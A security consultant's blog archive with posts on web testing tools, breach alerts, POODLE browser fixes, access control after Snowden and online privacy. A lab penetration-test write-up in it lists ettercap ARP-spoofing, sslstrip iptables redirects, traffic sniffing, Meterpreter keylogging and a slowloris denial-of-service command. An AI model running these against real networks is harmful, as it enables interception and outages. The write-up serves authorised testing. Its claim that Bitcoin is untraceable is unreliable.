Category Archives: Hacking

Web Application Pen testing with OWASP ZAP (liking it)

Penetration testing is one of the methods used to validate a security posture of a network or application. While not all pentests can discover everything they are good at testing what you like and sometimes what you didn’t know existed. OWASP ZAP (Zed Attack Proxy) is just one ofthe Java based tools that you can fire up fast enough and get cracking. This review isn’t going to be technical in steps and methods, at least not too deep, but will reflect on the kind of functionality and purpose you are looking for in a tool.

OWASP ZAP can be used with its proxy settings enabled so you can view, review, edit or modify text as it goes towards the target. Great for testing local encryption, SQL injection, and XSS attempts etc click jacking. When setup in the proxy settings you can test how input is sent/received and accepted and the response the server gives. A great tool for troubleshooting and hardening applications as well and testing the performance of such applications. While using this I discovered that a good youtube video showed many attacks that are possible on most database or application web sites that people just pay no mind to. It is amazing the number of subtle security flaws that if leveraged in a certain attack can lead to more and more information leakage that a cracker can grab and escalate with.

Interesting videos
OWASP ZAP Tutorials

Security Testing for Developers Using OWASP ZAP

Lifelock Alerts – You’ve Been Hacked or A Social Site Was…Where’s the Proof Lifelock?

Recently I was made aware that my personal email account was some where on the black market from an alert from Lifelock. OK, I can see how that can happen when LinkedIn dropped the ball on security. It was attributed to the LinkedIn Hack from a while back in 2012 and now the spoils of hacking resurfaced May 2016.


In May 2016, LinkedIn had 164 million email addresses and passwords exposed. Originally hacked in 2012, the data remained out of sight until being offered for sale on a dark market site 4 years later. The passwords in the breach were stored as SHA1 hashes without salt, the vast majority of which were quickly cracked in the days following the release of the data.

Compromised data: Email addresses, Passwords

The website havieibeenpwned has recorded the hacks and is a great source to use. The reason why I point you to that site is from a call to Lifelock that didn’t go the way I wanted it to go. First off I wanted to know what site out there has my information that they were able to scour and find. Lifelock Operator “I’m sorry sir, we don’t have that information in the alert. I can only see what you see. I do know that they scan 10,000 sites for this information.” Yes OK great, now please go get your supervisor. Supervisor “Sir, yes its true this happened and we urge that you change your password and maybe even your email account altogether.” OK Ms. Supervisor but where did you get that information from? I work in security and I work with ones and zeroes. Apparently, I can’t get away from the zeroes. If the site exists you must have a record somewhere with my email address and old password is located. All Ms. Supervisor could do was re-state the obvious that they didn’t have the information. How about your IT department I said, can they help us out? Nothing.

So later on trying to do something else I hop over to Netherlands and try to get some email and wouldn’t you know some Google Alerts say “hey someone tried logging in with your account”. I’m like yes, me. Shortly after the next day Lifelock gets the same thing and I get an alert sent to my cell. OK this is how Lifelock works. Working with Google finding out when someone attempted to use my account. Not impressing me.

Lifelock is basically selling Cyber Insurance and are not providing the details of where they found my information. This post is to challenge you to think what exactly are we getting for a service that I can’t get from News Sources on the web about breaches. Where is the proof Lifelock? That is my challenge to you. Don’t call me up and tell me something is out there…we all know that.

While you’re browsing the web, here is a nice article, recent too, about identity protection services not what its cracked up to be. Why Identity-Theft Protection Isn’t All It’s Cracked Up To Be (Kaveh Waddell)

A better eyebrow raiser Despite Promises, Lifelock Knows Public Data is A Risk Guess I’m not the only one calling Lifelock out in the street.

Too Silo’d to React, Now Respond.

Ever think what would happen if you ever got hacked? Maybe you are wondering if the IPS guys or the HIPS guys are really doing their jobs? In corporate America it is real easy to overlook a lot of precautions and security because you’re just too leveraged. Today’s threats are evolving as bad actors continue to find ways inside. They utilize social sites and technology, human frailty of being needed, and work their way through with some advanced IPS and IDS and Anit-X evasion techniques. So what are you to do?

Looking at the problem in your cube doing your work on your piece of the asset. Your mind tends to think “OK this is what I have to do and I move on to the next asset and service on that asset.” That is all you can touch. You’re ethical hacking group is looking too busy or not too busy to assist and maybe they can or cannot really find all the holes in your security posture. How about a resident hacker just for that client or span of control of clients that you have. Where one can check the security by reviewing the vulnerability report made with hacking tools. However, the key difference here is not to pay for a once a year penetration test but make it so that you test regularly. Red team vs. blue team and then provide results to management. Also, just testing monthly to make sure patches and firewall rules are in place would be great. I think this would be one of the best security practices a company could get into. RedSeal is a software solution that provides visibility into an organizations security by analysing configurations and building out the network diagram. It can then import vulnerability reports and host information to really give you the what if scenario that you have been thinking about in your cube. It will also give you your list of objectives to test and make sure you that the holes found are true and need to fix.

Security is not something you buy or do once in a while. It’s a practice built by defined policies and procedures that are completed over and over again. If you think you are failing to practice the right procedures every day or that your vigilance is intermittent, then I think you are a good candidate for some building security into everyday operations 101. Yes, a bit wordy there but think about it, its not rocket science the hurdle is time, the silo, and the recognized concept.

In conclusion, the best security is a resident security expert allowed to do their job by proving tools and processes. If you cannot get a resident hacker or spend time doing this allow me to make some suggestions. Get a requirement opened from HR to fill this role or hire a service from a firm that understands vulnerability assessments and penetration testing.  Allow them to practice regularly providing results to you and maybe you can stay out of the news. Security awareness and training also helps prevent attacks because users bring the risk in from their computers. The biggest tools to get in are Adobe Flash & Reader, Java, and spear phishing.

If you have any questions or comments or looking for advice on services and where to go, feel free to contact me

OpenDNS – Use It!

OpenDNS – Use It

I cannot say it enough. Wherever I go and when I can, I always advocate using OpenDNS. They screen the web urls before you do. So you will never hit a bad site. Defense in depth is addressed here as well. You need to watch your perimeter as well as the deep inside where your users reside. In fact most cases in hacking events today involve end users. What do they do all day ? Work and when they get a chance to blow off steam or check on personal email you open yourself up for risk. This means that all the end users open your company up for attack via data leakage, IP losses, and corporate espionage. What’s funny, when companies buy other companies they inherit the risk associated with their systems. Has anyone really ever thought about the risk inherited by hiring you, the employee? Maybe the board will start to re-think M&A and apply it to the microcosm in the work place.

Recently SANS news Bites released an article about OpenDNS and detecting domain shadowing.

–Detecting Suspicious Domains
(March 5, 2015)
Technology being developed by OpenDNS aims to hasten detection of
malicious websites and domains. The technology, called Natural Language
Processing Rank (NLPRank), checks for suspicious site names. To reduce
the incidence of false positives, it also checks to see if the domain
is running on the same network that the organization it claims to be
from actually uses.
[Editor’s Note (Northcutt): OpenDNS is a really cool operation and if
you are not using it for your home network you should really consider
it; this goes double if you are a parent. And NLPRANK is an idea whose
time has come. The idea of registering domain names that are similar to
valid and trustworthy names e.g. is not new. What is
fairly new is the ability of attackers to prepare an attack, register
these slightly-off domains, embed them in tiny urls, phishing links in
emails, etc., and mop up the opportunities the people that succumb to
the attack present them in a very short period of time. In manufacturing
and quality control, people are very sensitive to cycle time. We need
to apply that type of mindset in defensive cybersecurity: ]

The article comments on the ability of NLPRank which is natural language processing rating system where for example, a domain name registered recently, with bad spelling/purposely misspelled, and or bad email registrant information will give the domain a negative rank. This would be blocked from users that utilize OpenDNS or a warning showing its risky like WoT did with their color scheme for web site search results. The system is still in testing at the time of this writing but should be usable in the near future. Hats off to OpenDNS, continuing to shock and wow the world and giving people and businesses an edge in thwarting cyber criminals.

POODLE – What to do about it (CVE-2014-3566)

POODLE CVE-2014-3566 is a vulnerability where negotiations between client and server result in a lower security protocol (from TLS 1.0 to SSLv3) being used in which oracle based side channel attack can leak predictable padding and give an attacker utilizing MITM the upper hand in obtaining ciphertext, session IDs, and decrypt them. There is a possibility for hijacking sessions when users go off corporate security infrastructure to other sites. Work around are suggesting to down grade to SSLv2 from SSLv3 but I would suggest the opposite. Use TLS 1.1 or 1.2. Have users work from within the corporate network, go to safe sites, DO NOT USE Hotspots and open WifFi connections for business related activities. A lot of applications like Java, ASP,NET, Ruby on Rails, C+, Pyhton, Perl, PHP, and ColdFusion are targets for this padding side channel attack. Maybe even forcing 24×7 VPN connections and forcing users to go through corporate security infra-X will help protect corporate assets. End users should not use corporate computers for personal use until this is resolved. There are settings in browsers and on Windows computers to force using various SSLv2 settings or TLS 1.0 or higher settings found here,news-19775.html

Check your browsers here

Browser Fixes
Mozilla Firefox

Type about:config into the address bar and hit Enter or Return. Click “I’ll be careful, I promise!” in the resulting warning window. Scroll down the list of preferences and double-click “security.tls.version.min”. Change the integer from 0 to 1 and click OK.

Google Chrome

For Google Chrome, you’ll have to temporarily become a power user and use a command line. The instructions are a bit different for Windows, Mac and Linux.

In Windows, first close any running version of Chrome. Find the desktop shortcut you normally click to launch Chrome and right-click it. Scroll down to and click Properties. Click the Shortcut tab. In the Target field, which should end with “/chrome.exe”, add a space, then add this: “–ssl-version-min=tls1” (without quotation marks). Click Apply and then OK.

Microsoft Internet Explorer

Click the Tools icon in the top right corner (the icon looks like a gear). Scroll down and click Internet Options. In the resulting pop-up window, select the Advanced tab, then scroll through the list of settings until you reach the Security category. Uncheck Use SSL 3.0, click Apply, and then click OK.

Diving Deeper

Leaking of information as written per wiki is the norm when padding to match the underlying cryptography. This is the case for ECB and CBC decryption used in block ciphers. Attackers could decrypt as well as encrypt messages using server keys and not knowing the keys themselves. The issue is the predicate-able padding and initialization vectors being implicit instead of explicit. While solutions for servers are to upgrade OpenSSL I would move to something stronger and force clients to do the same. If we do not push for better security now, then when? Yes there will be some pains in the transition but I believe if we fend off the attackers at the perimeter and on the users inside, we will all be better off. Web servers using TLS 1.2 is only around 18% according to Qualys. Qualys further stated moving up to TLS 1.1 or 1.2 doesn’t mean BEAST attack is thwarted but that there could be another attack vector not known yet.

Snowden Picking Info Off the NSA Network – What Went Wrong

As agreed I’d revisit this article from Computer World

The story is just screaming some basic fundamental but glaring omissions in the security practice. In the CISSP study material by lesson 3 or in the beginning they address least privilege roles and mandatory and discretionary controls. Where is the payoff of hiring someone with a CISSP working for the NSA who failed to demonstrate this practice? Why is it that we can see when people access certain shares and yet the big machine cannot?

The documents were kept in the portal so that NSA analysts and other officials could read and discuss them online, NSA CTO Lonny Anderson told National Public Radio in an interview Wednesday.

As a contracted NSA systems administrator with top-secret Sensitive Compartmented Information (SCI) clearance, Snowden could access the intranet site and move especially sensitive documents to a more secure location without raising red flags, Anderson said.

Thus, Snowden could steal the NSA Power Point slides, secret court orders and classified agency reports that he leaked to the media. “The assignment was the perfect cover for someone who wanted to leak documents,” Anderson told NPR.

“His job was to do what he did. He wasn’t a ghost. He wasn’t that clever. He did his job,” Anderson said.

That above mentioned quote should get a knee slap at happy hour for being duped by Snowden. While he wasn’t “clever” Ms. Anderson to hack in and get the loot he was clever enough to do it and leave before you stopped him. He went right in the front door and did it right under your nose. You’d be wise to allow only the people that need to know actually perform the technical work with the same controls mentioned below here with tagging a.k.a. similar to audit trail enabling.

The NSA has also started “tagging” sensitive data and documents to ensure that only people with a need to see a documents can access it. The document tagging rule also lets security auditors see how individuals with legitimate access to the data are actually using it, Anderson said.

This leads the general public to believe that you are using some Windows file share system and not a content delivery system that has audit trail turned on from design and the start of the system. This brings me back to my pharmaceutical days where there was a vendor Agilent who made a document system where one could see research and look up based on metadata. The NSA could learn a lesson here.

The following excerpt of the article indicating a response from Eric Chiu, is one I disagree with. While role based security is nice for the group, let’s look at the individual. As stated by Mr. Chiu

“Companies need to shift their thinking from an outside-in model of security to an inside out approach,” said Eric Chiu, founder of Hytrust, a cloud infrastructure management company.

“Only by implementing strong access controls [like] the recent NSA ‘two-man’ rule as well as role-based monitoring, can you secure critical systems and data against these threats and prevent breaches as well as data center failures,” he said.

Where is the detailed log of the individual user? In discretionary access control the user can make policy decisions contrary to mandatory access control. From the wiki for quick reference

With mandatory access control, this security policy is centrally controlled by a security policy administrator; users do not have the ability to override the policy and, for example, grant access to files that would otherwise be restricted. By contrast, discretionary access control (DAC), which also governs the ability of subjects to access objects, allows users the ability to make policy decisions and/or assign security attributes. (The traditional Unix system of users, groups, and read-write-execute permissions is an example of DAC.) MAC-enabled systems allow policy administrators to implement organization-wide security policies. Unlike with DAC, users cannot override or modify this policy, either accidentally or intentionally. This allows security administrators to define a central policy that is guaranteed (in principle) to be enforced for all users.

I believe the correct solution would be a Lattice based access control implementation where the user can only access data if their security designation is greater than the target AND there is user logging while in the system.

Now taking this story down the rabbit hole what makes you think that glasses wearing Snowden didn’t go in and read the documentation and record it with super spy glasses? How about the cell phone camera? How about a phone call with him reading verbatim the information right off the screen? These are also fundamental physical breaches that may or may not be considered as this can be done in plain sight. Why was he accessing so many files? Why wasn’t the 6 month security access check picking up on his behavior? Why isn’t the NSA watching their own people more closely than they are watching us? How come Israeli people can detect malicious people in airports by watching and interviewing them with no mechanical screening but the old fashion way?

Penetration Testing with Linux – Featuring Kali and Armitage

Netwerk Guardian LLC is bringing this to you showing what can be done penetration testing with Kali or Backtrack and using Armitage. This is a technical subset of my thesis on Effective Penetration Testing. So without further delay…

Penetration testing with Linux is one of the best ways to perform tests. It is a
versatile tool. Linux comes in many flavors like Backtrack5 RC3 or now Kali. Linux allows for the customization of the software itself plus the tools that you use. Therefore, the customization and level of sophistication is limitless. This article will cover using Backtrack5 RC3 and Armitage for the test as it was executed during the pen test. This article may not cover all features of Armitage. However, in order to provide you a better understanding of Amritage, Kali will be used as well in different screenshots. Note that Armitage is no longer supported under Backtrack with the recent release of Kali in early 2013. We chose to use Kali in this article to show you something recent but the other versions of Linux are still very good tools to use in the field.

Backtrack comes loaded with metasploit and as you know in order to find and run an exploit you have to switch to the directory and run the commands specific to it. This is no longer the case with Kali and the FHS (Filesystem Hierarchy Standard) Kali has taken care of this to make all commands system wide accessible from the command line. Armitage provides a nice GUI interface to Metasploit. It also has a dashboard you can use for setting up the hosts or network you are going to target. You can import hosts from files associated with other network security assessment tools like Nessus, IP360, and Burp session xml. Armitage imports anything from a text or xml file. You can use some of the automation presented with Armitage. In addition, it is wise to use customized these scripts when delivering a penetration test. You never really know what the outcome may be unless you test in a lab first. The great thing about Armitage is that it has a database of known vulnerabilities and attacks in which you can draw from in your test. This helps save time and keep you focused but not all exploits work as targets can be hardened. Customizing scripts and Linux has long been the core of these releases. Armitage can be used as a standalone tool as well as network solution when working with other pen testers. There are a few reporting options that can be used with Backtrack or Kali to save your work and share results or progress. Armitage has its own place to store evidence in data format but not in a report format that would be all inclusive. This is what is called loot where the results go.

Launching Armitage comes from navigating to the Applications menu item and following the terms Kali Linux > Exploitation Tools > Network Exploitation > Armitage (Image 1). In this new installation of Kali, you will have to manually type the following commands in order to get Armitage to connect to the database. They are; service postgresql start and service metasploit start. Once these are entered, you can start Armitage successfully using the install default user name msf and password test.
Image 1

Next there are a series of prompts that you will be directed to for launching and customizing port usage. Once Armitage is open we can begin using it to scan for hosts or network subnets. Just launch nmap (Image 2) from within Armitage and choose to add a host or scan a network with several scripted choices. The rules are the same for using nmap in Armitage and by itself. There are aggressive scan and quieter scans. So choose wisely in order to remain quiet. The machines we want to target are and One is a server hosting the core business application and the other is a typical user workstation. See image 3 below from the previous run pen test Armitage on Backtrack5 RC3.

Image 2 (Launching nmap within Armitage)

The next step you want to use is the find vulnerabilities scan. This takes Armitage and scans the hosts out there and it comes up with a proposed list of attacks. Now not all and every attack is going to work. It will give a type of technology to exploit. This coupled with your experience and training can then discover that it may or may not be successful. This is where the pen tester needs to be on their best game to find an exploit in which to launch a payload. What is good about Armitage is that each exploit or payload you try opens a new tab. So you can see what works and doesn’t and where to go next.
Now that we have our hosts found, targeted, and with an attack list, we can proceed. Since the machines were Windows based, we quickly went to this exploit to see if there was a way to pwn the boxes. In Armitage you can assign accounts to each host that is used to login and run the payloads. We chose many exploits but found that only one really works and will be addressed later. Below in Image 3 you can see that when a system username and password are known and the Login > psexec is used, the lightning is seen all around it.

Image 3 (Note the lightning around Hosts = pwned)

In the pen test shown here the machines’ administrator accounts were known in a white box test to see if we can sniff traffic from the core business application. The objective is that we are going to imitate an insider threat or demonstrate beyond passing the hash for Windows users in the network.
The following shows what we want to test. This is taken from a lab setup a typical company using earth materials management system. The network is made of Microsoft Windows machines with Windows 7 for end users and Windows Server 2008 R2. The objective is to look for vulnerabilities on the host machines to see if we can capture data on the hosts going across the network to the server for corporate espionage.
1. Test Core Business Application
a. Test core business application against
i. Clear text traffic capturing
ii. Man in the middle (MITM)
iii. Spoofing
iv. Armitage w/Meterpreter
v. DoS Slowloris

Port Scanning Results and Issues
Scanning Windows machines

The first test was scanning of services and ports on Microsoft devices. The test discovered the default Windows system ports open for unsigned SMB, telnet, and high ports. This included the port scanning by Nessus as well as the Microsoft Baseline Analyzer. The results from Nessus showed that there existed an unsigned SMB/Samba port (445) as well as using the open clear text port channel (23). Nessus found only (1) medium and (1) low alert for the server Port (135) on the workstation was found open and that was used for remote procedure protocol. Port (139) was found open and used with SMB for file sharing with other devices beside Microsoft. Port (808) is the Streetsmarts Web based application running encrypted. Port (992) was found to be an SSL port with a certificate error. Additional ports were found open ranging from (49152-49157) and were due from a release from Microsoft in January 2008 to start the open port range at that (49152). Some P2P (peer-to-peer) file sharing has been known to run over these ports.
The possible attack that could have occurred but was not conducted in the test was escalation in privileges via SMB vulnerability and brute forcing usernames and passwords. The attacker also could have social engineered the information from an unsuspecting user. There is a probability that this could have happened.

Armitage has the option for you to ask it what vulnerabilities and attacks could be possible on the chosen target. Just go to the host and select it and then go to the menu Attacks > Find Attacks. It will return a list of possible attacks and say “Happy Hunting!” Therefore, that is exactly what happened.

The following tools were used to test a vulnerability of unencrypted communication on the LAN (Local Area Network) with ettercap always being used for the MITM. They are SSLstrip, Dsniff, Driftnet, Urlsnarf, and meterpreter.

Technical Overview – Sniffing MITM Attacks
Using Ettercap we copied traffic from the user and the gateway to our pent-testing laptop. We used Ettercap with the following in an attempt to see traffic, sslstrip, urlsnarf, dnsiff, and Driftnet with these commands entered. In Ettercap we scanned the subnet and added a target 1 = gateway and target 2 = the victim machine. Here we were able to get a copy of everything being sent by the user to the laptop (attacker) first before going to the real gateway. This is done with sslstrip, iptables, ettercap with MITM attack arp spoofing. It is very important that in a test where you are trying to conceal what you are doing from detection that you must ensure you laptop is able to handle the traffic. You must be ready to execute the sequence of commands in order to avoid seeing packets destined to the same IP address twice.

Each attack and tool used has its benefits and limitations. The idea was to see data going across for corporate espionage and send to a competitor for money. The tools researched and chosen for this pen test to see what would really come across the wire. The following is a brief overview of each tool.

SSLstrip – Is a tool that prohibits a connection from upgrading to an SSL session in an unnoticeable way. Also the history behind this is that one could forge a certificate as being signed and trusted in order to appear as an https session or that the session was legitimate with the intended server that actually ended up being the attacker (Wikipedia).

Dsniff – A tool used to sniff anything of interest like email or passwords. Arp spoof has to be running of course so that the traffic is routed through the attacker PC and back out to the real router and PC (Wikipedia).

Driftnet – This tool allows you to see what images are going across the user’s browser while surfing the web. In this test users were not on the internet but were using a browser to launch an application which we wanted to see.

Urlsnarf – A tool that places all visited url output to file for easy reviewing. Not a tool that provides much advantage in this pen test.

Meterpreter – This tool can be used to take advantage of many vulnerabilities in different platforms in order to gain root access or control of a PC.

Script Execution
In the following presentation of code we see that numerous attempts utilizing ettercap and arp spoofing was done to send traffic to the attacker. Each tool was run alongside ettercap to see what information would actually pass to the attacker. The most exciting tools were Driftnet and meterpreter because of what could be seen and the control.

ettercap –mitm ARP:REMOTE –text –quiet –write /root/sslstrip/ettercap.log –iface eth0
Also the GUI was used to pick target client Windows 7 machine and second target the application server

Execute the following commands
In the CLI we entered:
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/#cat /proc/sys/net/ipv4/ip_forward
root@bt:# sudo iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
Now verify it took the filter
root@bt:~# iptables -L -t nat
target prot opt source destination
REDIRECT tcp — anywhere anywhere tcp dpt:www redir ports 10000
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
target prot opt source destination
root@bt:# sudo python -l 1000 -f lock.ico

Results sslstrip: No data or text of any sort was visible, since all data was being passed through an encrypted channel.

Results with dsniff: Web addresses were visible, but no usernames or passwords. These results show that the application is very secure.

Results with driftnet: There were no pictures or images of the site going across. There were web addresses being listed.

Results with urlsnarf: The only thing that came through here was some local address space and some internet address space redacted for publication. Still there were no real gems of information for quick gains.

Technical Output
root@bt:~# urlsnarf -n -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128] – – [15/Jan/2013:23:10:12 -0500] “GET HTTP/1.1” – – “-” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:10:13 -0500] “GET – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”

Executed commands (example):
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/#cat /proc/sys/net/ipv4/ip_forward 1

In another terminal, we used Driftnet
root@bt:/# driftnet -i eth0
root@bt:/# driftnet -i eth0 -v -s (in an attempt to gain audio being streamed)
We could then see what the user was looking at for images.

Results: Images from core business application were not being sent to our laptop despite driftnet running
root@bt:~# driftnet -i eth0 -v
driftnet: using temporary file directory /tmp/driftnet-AmaowM
driftnet: listening on eth0 in promiscuous mode
driftnet: using filter expression `tcp’
driftnet: started display child, pid 2562
driftnet: link-level header length is 14 bytes
.driftnet: new connection: ->
…driftnet: new connection: ->
…driftnet: new connection: ->
…driftnet: new connection: ->

Meterpreter – Meterpreter used in with Armitage a connection made it impossible to glean any data or provide a way to leak data out; Meterpreter was used in this test. Knowing the administrator password, the connection was possible. Even a regular user with a known password would be able to both pass the hash dump and crack passwords later in order to attempt to escalate privileges. Time being the factor is how successful the cracker would be by going slow and password cracking.

Results: We were able to log keystrokes and take screen shots of the user’s computer. This is one way data could be captured. In this test, we show that key logging and screen captures are possible; however, they are not very effective as shown below, Image 7. Anything that was operating on the application level of the OSI model remained visible and the tool worked. When things went encrypted at the network level it was impossible to see.

Image 4 – Armitage Text Output of Key logging


Image 5 – Email Credentials Entered

Image 6 Screenshot Before Launching Encrypted Application


Image 7 – After Launching Encrypted Application

We have seen before that the desktop can be captured with screen shots and information could be leaked this way. However, notice in the image below that the application icon is present as a big ‘S’ in the toolbar, and on the workstation it is in the foreground. However, the image reveals that it is not seen and therefore encrypted to the reverse tcp shell. That ‘S’ represents the business’s core business application. The launch html page is the only visible part of the application, which is done on port 80. This demonstrates that the application running on the computer was able to encrypt all activity for queries, results, and navigation.

DoS – Slowloris Python Script

Now we get to some fun. Besides trying to sniff traffic and look at client proprietary data, we can also try to make their systems unavailable to them for this test. Remember that an unavailable system is loss of income or a serious impact that can make generating income and staying operational difficult to do. The script that we will use is a python script called slowloris. This script can be found at There is a script for IPv6 as well. This script is unique in that it does not try to hammer the web server right away with a full load of requests but that it comes in waves. There is a setting in the script for the number of connections per second and the frequency of those connections. These two fields were used against the server. The server was a Windows Server 2008 R2 (fresh install and no updates).

In order to start the script after you have downloaded it to your pen test PC is by As with any test you start with what is supposed to work and then review the results and make changes. The changes we made were simple as each time slowloris runs it makes a whole bunch of half requests to the web server. The requests never get finished and the web server is just sitting there with a session consumed waiting for the user to resume communication. This weakness is known for some Apache servers but not on IIS 7.0. At the time of this test it was unknown but thought it would be fun to try. Also check to make sure that you have Perl installed perl –v as most Linux instances do.

We modified the script to change the number of connections and then we lowered the timeout period for waiting to start that new connection. As the script ran we would notice the CPU on the server would spike to 78% and then 100% and then go down again as the script had entered its wait interval. Then it would run again and we would see similar results on the CPU. Now as far as hacking goes if you do not get the results you want just keep trying. So we stopped the script and change the connection per second to the maximum it would take 10,000 per second and again tested. After the second run the Server 2008 R2 would just take a hit but continue to serve out the web page. Unfortunately for the pen tester there was no break in service. Fortunately, for the company running the software they stayed operational. As a side note for non-Linux tool we used the Low orbit Ion Cannon multiple times on the server in addition to slowloris and still the web site was up.

The following commands will result in the same activity as we tested earlier in 2013. ./ -dns -port 443 -timeout 30 -num 10000 –https

In conclusion, we see that Linux offers a wide variety of attack tools that can be run independently or a part of a package like Armitage, Kali, Ubuntu, and of course the metasploit framework. This gives penetration testers the tools they need to perform tests against vulnerabilities by testing the exploits with different payloads. Some Windows based tools that can be used have gained notoriety but still Linux is a preferred platform. What is great about Linux and the open source community is that there are a lot of people contributing to its success. That is something that will carry the distributions forward as time and technology change.

Going Black – Making it Tough for Big Brother (Series)

Good day, I hope today finds you in perfect peace. Today we are going to talk about a new service and a new approach to keeping your data private. Recent events showing that the NSA as well as the big companies out there are profiling you. They want to store your identity and habits for future use. Netwerk Guardian is going to show you how to thwart their efforts. What good is it to the NSA or Google or any place that collects and harvests your personal profile through behavior monitoring, its information on how you think and live. They can use that information against you if they would like to have a contest of who can put more shame on whom. More likely, they will use it to see your political bias and connections. After the Snowden release, they really cannot be any more shameful than now. Therefore, we are going to show you how to give them useless data. Useless data really renders a system useless and reduces the taxpayer’s dollar (your money) to really a waste of money and time. I hope that enough people do this, maybe then they will get the picture and just stop. This will be at the end of the series. However, the evil in man and the lust for power and control will likely just make this tick them off and come up with some other regulatory way to make you commit information to them about you.

First step in going off the grid and going black is to change everything you use to something else. Change you email address, your online profiles, if you have Facebook, MySpace or other limelight platforms…ditch them. YouTube is going to be tough to leave but granted, if another site is made that offers the same service then that too will be a success. Until then use TOR network and a VMware appliance. The best way to change your email address is buy a domain. It can cost you but what is your privacy worth?!

Second, is buy or use free encryption software to encrypt your emails. Granted, it is going to be a bit painful in the beginning but you will sleep better knowing that it is you and the close ones around you that know who you are. There are a few places on the web you can go to get this service. However, I would rather encrypt locally. One place is while I have not used it, it seems to do the job. There is a group researching the use of a java based encryption and decryption tool that works on anything found here . I think this will carry for into the future for use on mobile devices with various platforms running. More to come on this as more software comes to mind.

Third thing that can be done is to start using TOR network for browsing as well as proxy servers for ditching your fingerprints on the web.

Fourth, is that you could start using another forma of currency that the Federal Reserve will not approve, BitCoin. Untraceable but holds it worth. There is movement to make this outlawed since it cannot be regulated by one particular body (Global Banks) so it obviously works.

In the meant time if you have time, you can use some automation and start sending up erroneous web traffic data under your old Gmail account and start using Google search page.

More to come as we investigate and get back in control of who gets access to what. Stay tuned because this service is being launched by Netwerk Guardian to accept requests to anonymize one’s identity and provide safe ways of browsing and using the internet.

Just think…I privatized your God given right to be yourself. This peace of mind comes with a little costs but we now will have done two things, privatized anonymity and stimulated the economy in the technology and security sector.

Keeping Your Internet and Computing Private

Recent stories about Edward Snowden gets you thinking just how secure and private your “Personal Computer” really is. The big data companies are always promoting Google Voice, Google Chat, Gmail and all that. You have to ask yourself why is that free? What are they really trying to push? Each year you are at the edge of your seat when you hear they are allowing another free year of Google Voice. Well that is because you the public are offering free intelligence to them and willingly. We all psychologically want to be a part of something. We all like gadgets and technology as it makes our days fin and easier. Well to combat that surveillance of Big Brother or Big Sis, you use the following apps from Android Market Place.

Orbot Proxy with TOR – Surf Anonymously with TOR project. They will never know you are coming to visit.
TextSecure – Secure Text messaging on device and in transit
Gibberbot – Secure chat with popular chat programs, providing the other user has Gibberbot or Pidgin and uses services like Google Chat.

All these applications are a step forward to guarding your mobile privacy. Start falling off the grid with these applications. Next, start using TOR network at home. Start using VMware for surfing and use your chassis computer for the local network best you can.

There will be more tips coming in the days ahead of how to be safe and private on the web.